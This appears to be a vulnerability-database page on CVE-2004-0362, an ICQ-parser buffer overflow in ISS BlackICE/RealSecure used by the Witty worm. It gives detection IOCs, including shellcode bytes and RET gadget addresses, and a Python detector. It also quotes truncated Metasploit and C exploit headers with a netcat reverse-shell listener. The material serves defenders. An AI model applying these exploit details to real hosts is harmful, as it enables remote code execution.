CVE-2004-0362
Published: 2004-04-15
Priority: P2 · 61 · high · CVSS 2.0 base score 7.5 · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available (see the Exploit-DB and Metasploit entries below)
EPSS: 73.33% (99.4th percentile)
Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure, Proventia, and BlackICE products, allow remote attackers to execute arbitrary code via a SRV_MULTI response containing a SRV_USER_ONLINE response packet and a SRV_META_USER response packet with long (1) nickname, (2) firstname, (3) lastname, or (4) email address fields, as exploited by the Witty worm.
Affected
93 version ranges indexed; the 25 shown resolve to four ISS products (version range and fix data were not extracted):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iss | blackice_agent_server | — | — |
| iss | blackice_pc_protection | — | — |
| iss | blackice_server_protection | — | — |
| iss | proventia_a_series_xpu | — | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- `\x05\x00\x00\x00\x00\x00\x00\x12\x02`
- `\x05\x00\x00\x00\x00\x00\x00\xde\x03`
- `\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01\xfc\xff\xff\x83\xe4\xfc`
Detection notes:
- The exploit binds locally to UDP port 4000 and sends the overflow packet as a single UDP datagram (~1199 bytes). A single oversized UDP packet to a BlackICE/RealSecure host on any port (the destination port is randomised) containing the ICQ SRV_MULTI + SRV_META_USER structure is a strong indicator.
- The exploit can be sent to a broadcast address and with a spoofed source IP. Network detection should not rely solely on source IP matching; inspect payload content for the ICQ opcode sequence 0x0212 / 0x006e / 0x03de within a single UDP datagram.
- The Metasploit module uses a payload space of 469 bytes (504-31-4) with no NOPs and a stack adjustment of -3500. The overflow overwrites the return address; known RET gadget addresses include 0x5e0a47ef and 0x5e0da1db inside iss-pam1.dll itself, making DLL-specific memory address monitoring viable.
- The ISS exception handler recovers the process after each overflow, enabling bruteforce exploitation. Repeated UDP packets with the same ICQ SRV_MULTI/SRV_META_USER structure in a short time window (bruteforce pattern) should be alerted on.
Mitigation notes:
- The destination UDP port is randomised by the Metasploit module (rand(65536)), so port-based filtering alone will not reliably block or detect this exploit.
- The exploit packet can be sent to a broadcast address, meaning a single packet can target all hosts on a subnet simultaneously. Perimeter firewall rules blocking inbound UDP to individual host IPs are insufficient; broadcast UDP must also be filtered.
- The source IP of the exploit packet can be spoofed, so source-IP-based ACLs or reputation blocking will not prevent exploitation.
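The detection notes above boil down to three checks on a single UDP payload: the ICQ v5 opcodes 0x0212 (SRV_MULTI), 0x006e (SRV_USER_ONLINE) and 0x03de (SRV_META_USER) appearing together in one datagram, the datagram being far larger than a normal ICQ status packet, and the same pattern repeating against one host in a short window. The following is an added example of those checks in Python; it is not code from the page's sources, the Metasploit module or the ISS products. It assumes the nine-byte ICQ v5 server header layout reflected in the byte IOCs (2-byte version 5, one zero byte, 4-byte session id, 2-byte command, all little endian), uses a size threshold of 1000 bytes chosen here rather than taken from the page, and feeds itself constructed sample datagrams that only mimic the opcode layout, not the real overflow structure.

```python
import struct
from collections import defaultdict, deque

# ICQ v5 server-packet header as it appears in the byte IOCs above:
# 2-byte version (5), one zero byte, 4-byte session id, 2-byte command,
# all little endian, nine bytes in total. (Assumed layout; the IOCs show only
# the fixed prefix \x05\x00\x00\x00\x00\x00\x00 followed by the opcode.)
ICQ_V5_HDR = struct.Struct("<HBIH")

SRV_USER_ONLINE = 0x006E
SRV_MULTI = 0x0212
SRV_META_USER = 0x03DE
WATCHED = {SRV_USER_ONLINE, SRV_MULTI, SRV_META_USER}
OVERSIZED = 1000  # bytes; threshold chosen for this example (exploit datagram is ~1199 bytes)


def find_icq_headers(payload: bytes):
    """Return [(offset, command)] for every ICQ-v5-shaped header in the payload whose
    command is a watched opcode. Every offset is scanned because the watched opcodes
    appear as sub-packets nested inside SRV_MULTI, not only at offset 0."""
    hits = []
    for off in range(len(payload) - ICQ_V5_HDR.size + 1):
        version, zero, _session, cmd = ICQ_V5_HDR.unpack_from(payload, off)
        if version == 5 and zero == 0 and cmd in WATCHED:
            hits.append((off, cmd))
    return hits


def classify_datagram(payload: bytes):
    """Return the reasons a UDP payload matches the IOCs; an empty list means clean."""
    cmds = {cmd for _, cmd in find_icq_headers(payload)}
    reasons = []
    if SRV_MULTI in cmds and SRV_META_USER in cmds:
        reasons.append("SRV_MULTI and SRV_META_USER in one datagram")
        if SRV_USER_ONLINE in cmds:
            reasons.append("SRV_USER_ONLINE sub-packet present")
    if cmds and len(payload) >= OVERSIZED:
        reasons.append(f"oversized ICQ datagram ({len(payload)} bytes)")
    return reasons


class RepeatTracker:
    """Counts matching datagrams per destination host in a sliding window.
    Keyed on the destination, not the source, because the source can be spoofed."""

    def __init__(self, window_s: float = 10.0, threshold: int = 3):
        self.window_s = window_s
        self.threshold = threshold
        self._seen = defaultdict(deque)

    def observe(self, dst_ip: str, ts: float) -> bool:
        """Record one matching datagram; True once the threshold is reached in the window."""
        q = self._seen[dst_ip]
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()
        return len(q) >= self.threshold


def icq_header(cmd: int, session: int = 0) -> bytes:
    """Build a header-shaped prefix for the constructed samples below."""
    return ICQ_V5_HDR.pack(5, 0, session, cmd)


# Constructed sample datagrams (not real captures, not the exploit layout).
BENIGN = icq_header(SRV_USER_ONLINE) + b"\x00" * 40           # one small status packet
SUSPECT = (icq_header(SRV_MULTI) + b"\x02"
           + icq_header(SRV_USER_ONLINE) + b"\x00" * 20
           + icq_header(SRV_META_USER) + b"A" * 1100)          # three opcodes, 1148 bytes


def run_demo():
    """Run both checks; returns (benign_reasons, suspect_reasons, repeat_alert)."""
    tracker = RepeatTracker(window_s=10.0, threshold=3)
    repeat_alert = False
    # Three matching datagrams to one host within two seconds: the bruteforce pattern.
    for ts in (100.0, 100.5, 101.5):
        if classify_datagram(SUSPECT):
            repeat_alert = tracker.observe("10.0.0.7", ts) or repeat_alert
    return classify_datagram(BENIGN), classify_datagram(SUSPECT), repeat_alert


if __name__ == "__main__":
    print(run_demo())
```

The scan deliberately ignores the UDP port and source address, since the notes above say both are attacker-controlled; in a real sensor the per-host counter would be fed from the packet's destination address and arrival time.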
No detection rules found.
Exploit-DB: ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)
Source: exploitdb · 2010-09-20 · CVE-2004-0362
---
```ruby
##
# $Id: blackice_pam_icq.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ISS PAM.dll ICQ Parser Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the ISS products that use
the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
will result in arbitrary code execution as LocalSystem. This exploit
only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
address.
The I
```
(listing truncated in the source)
Exploit-DB: RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow
Source: exploitdb · 2004-03-28 · CVE-2004-0362
---
```c
/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit
 *
 * Copyright (c) SST 2004 All rights reserved.
 *
 * Public version
 *
 * code by Sam (Sam`@efnet) and 2004/03/26
 *
 * Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c
 *
 * how works?
 * [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570
 * 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
 * - Sam
 *
 * # attack remote host: 192.168.10.2.
 * # listen host: 192.168.10.169.
 * # listen port: 5570.
 * # send overflow udp datas
 * # 1199 bytes send
 * # done.
 * # make sure we are in, dude :)
 *
 * [root@core root]# nc -vv -l -p 5570
 * listening on [any] 5570 ...
 * 192.168.10.2: inverse host lookup failed: Host name lo
```
(listing truncated in the source; only the header comment survives)
Metasploit: ISS PAM.dll ICQ Parser Buffer Overflow
This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.
No writeups or analysis indexed.
References
http://marc.info/?l=bugtraq&m=107965651712378&w=2
http://secunia.com/advisories/11073
http://www.ciac.org/ciac/bulletins/o-104.shtml
http://www.eeye.com/html/Research/Advisories/AD20040318.html
http://www.kb.cert.org/vuls/id/947254
http://www.osvdb.org/4355
http://www.securityfocus.com/bid/9913
http://xforce.iss.net/xforce/alerts/id/166
https://exchange.xforce.ibmcloud.com/vulnerabilities/15442
https://exchange.xforce.ibmcloud.com/vulnerabilities/15543